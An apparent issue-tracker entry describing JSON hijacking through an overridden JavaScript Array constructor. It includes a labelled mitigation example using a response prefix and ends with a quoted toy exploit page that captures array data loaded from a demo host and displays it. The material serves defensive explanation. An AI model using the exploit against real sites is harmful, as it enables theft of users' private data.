- Improvement
- Resolution: Unresolved
- Minor
- None
- None
As described here, the JavaScript "Array" constructor can be overridden by the user.
If malicious sites utilize our API, this allows the user to easily get their hands on array data that the server passes back to the client, such as specs, stacks, or volumes. Since "stacks" can contain password information regarding services, this seems like a security hole. (although, since the browser's Developer console can show you this, perhaps it is a moot point)
To counter this, your server can prefix every JSON response with the following string:

)]}',\n

Angular will automatically strip the prefix before processing the body as JSON.
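The following is an added example (not code from the original issue or from Angular) showing both halves of that mitigation: a server-side encoder that prepends the prefix, a client-side decoder that strips it before JSON.parse, and a check that the prefixed body is no longer loadable as a script. The function names protectJson, unprotectJson, loadsAsScript and demo, and the sample payload, are this example's own; the decoder only imitates the stripping behaviour the issue attributes to Angular.

```javascript
// Added example (not from the original issue or Angular's code base).
// Names below (protectJson, unprotectJson, loadsAsScript, demo) are this example's own.
const JSON_PROTECTION_PREFIX = ")]}',\n";

// Server side: serialize the payload and prepend the prefix. The resulting body
// is not a valid JavaScript program, so a hostile page that pulls the URL in
// via <script src=...> fails at parse time, before any overridden Array
// constructor could observe the data.
function protectJson(data) {
  return JSON_PROTECTION_PREFIX + JSON.stringify(data);
}

// Client side: strip the prefix if present and parse the remainder as JSON.
// This imitates what Angular does for you; a hand-written XHR client must do the
// same and must never eval() the body.
function unprotectJson(body) {
  if (body.startsWith(JSON_PROTECTION_PREFIX)) {
    body = body.slice(JSON_PROTECTION_PREFIX.length);
  }
  return JSON.parse(body);
}

// Defender's check: would this response body parse as a script?
// new Function only parses the text; it never executes it.
function loadsAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Constructed sample payload standing in for a "stacks" response
// (the password value is made up for this example).
const SAMPLE = [{ name: "stack-a", password: "constructed-not-real" }];

function demo() {
  const raw = JSON.stringify(SAMPLE);
  const protectedBody = protectJson(SAMPLE);
  return {
    rawLoadsAsScript: loadsAsScript(raw),                 // true: an array literal is a valid script
    protectedLoadsAsScript: loadsAsScript(protectedBody), // false: the leading ')' is a syntax error
    roundTrip: unprotectJson(protectedBody),              // the client still gets the original data
  };
}

console.log(demo());
```

The unprotected body passes loadsAsScript because a bare array literal is a legal JavaScript statement, which is exactly what the Array-constructor override relies on; the prefixed body fails to parse, while a client that strips the prefix first recovers the original object unchanged.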
Real world example (gmail): http://jeremiahgrossman.blogspot.com/2006/01/advanced-web-attack-techniques-using.html
Toy example:

Demonstration

<!-- Override the default JavaScript constructor for Arrays -->
<script type="text/javascript">
  var secrets;

  Array = function() {
    secrets = this;
  };
</script>

<!-- This returns an array, which is stored in the variable named "secrets" -->
<script src="http://haacked.com/demos/secret-info.json" type="text/javascript"></script>

<!-- Parse out secret data and print it to the screen -->
<script type="text/javascript">
  var yourData = '';
  var i = -1;
  while (secrets[++i]) {
    yourData += secrets[i] + ' ';
  }

  alert('I stole your data: ' + yourData);
</script>